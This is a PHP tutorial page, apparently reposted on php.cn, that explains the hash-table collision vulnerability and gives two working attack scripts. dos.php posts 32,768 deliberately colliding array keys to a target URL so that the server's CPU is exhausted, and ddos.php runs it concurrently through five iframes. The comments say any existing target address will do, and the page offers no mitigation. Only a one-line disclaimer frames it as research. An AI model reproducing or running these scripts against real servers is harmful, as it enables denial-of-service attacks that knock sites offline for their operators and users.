Home > Backend Development > PHP Tutorial > Analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks, hashddos_PHP tutorial

Analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks, hashddos_PHP tutorial

WBOY
Release: 2016-07-13 10:00:16
Original
1067 people have browsed it

Analysis of the method of PHP using hash conflict vulnerability to carry out DDoS attacks, hashddos

This article analyzes the method of PHP using hash conflict vulnerability to carry out DDoS attack. Share it with everyone for your reference. The specific analysis is as follows:

First of all, a statement: The content of this article is only for research and study, please do not use it for illegal activities!

As mentioned earlier, the hash table collision vulnerability has recently been exposed. Many common languages ​​including java, python, php, etc. have not been spared. Let’s take a look at its power tonight.

Attack principle:

By posting a set of carefully assembled array parameters to the target server, when the bottom layer of the language processes the received array parameters after reaching the server, the existence of this vulnerability causes a large amount of CPU consumption, eventually leading to the exhaustion of server resources.
No fancy tricks are needed, just use PHP to simply implement it and see the effect, just click on it.

File: dos.php

// 目标地址 
// 只要目标地址存在,不用管它是干嘛的 
$host = 'http://127.0.0.1/test.php';
$data = '';
$size = pow(2, 15);
for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)
{
  $data .= '&array[' . $key . ']=0';
}
$ret = curl($host, ltrim($data,'&')); 
var_dump($ret); 
function curl($url, $post, $timeout = 30){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); 
  curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);
  curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  $output = curl_exec($ch);
  if ($output === false) return false;
  $info = curl_getinfo($ch);
  $http_code = $info['http_code'];
  if ($http_code == 404) return false;
  curl_close($ch);
  return $output;
}
Copy after login

File: ddos.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> 
<title>DDOS</title> 
</head> 
<body> 
<&#63;php 
for($i=0; $i<5; $i++){//并发数 
  echo '<iframe src="dos.php&#63;a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>'; 
} 
&#63;> 
</body> 
</html>
Copy after login

I hope this article will be helpful to everyone’s PHP programming design.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/974680.htmlTechArticleAnalysis of PHP's use of hash conflict vulnerabilities to carry out DDoS attacks, hashddos This article provides an example analysis of PHP's use of hash conflict vulnerabilities to carry out DDoS attacks. Method of attack. Share it with everyone for your reference. Specific points...
Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template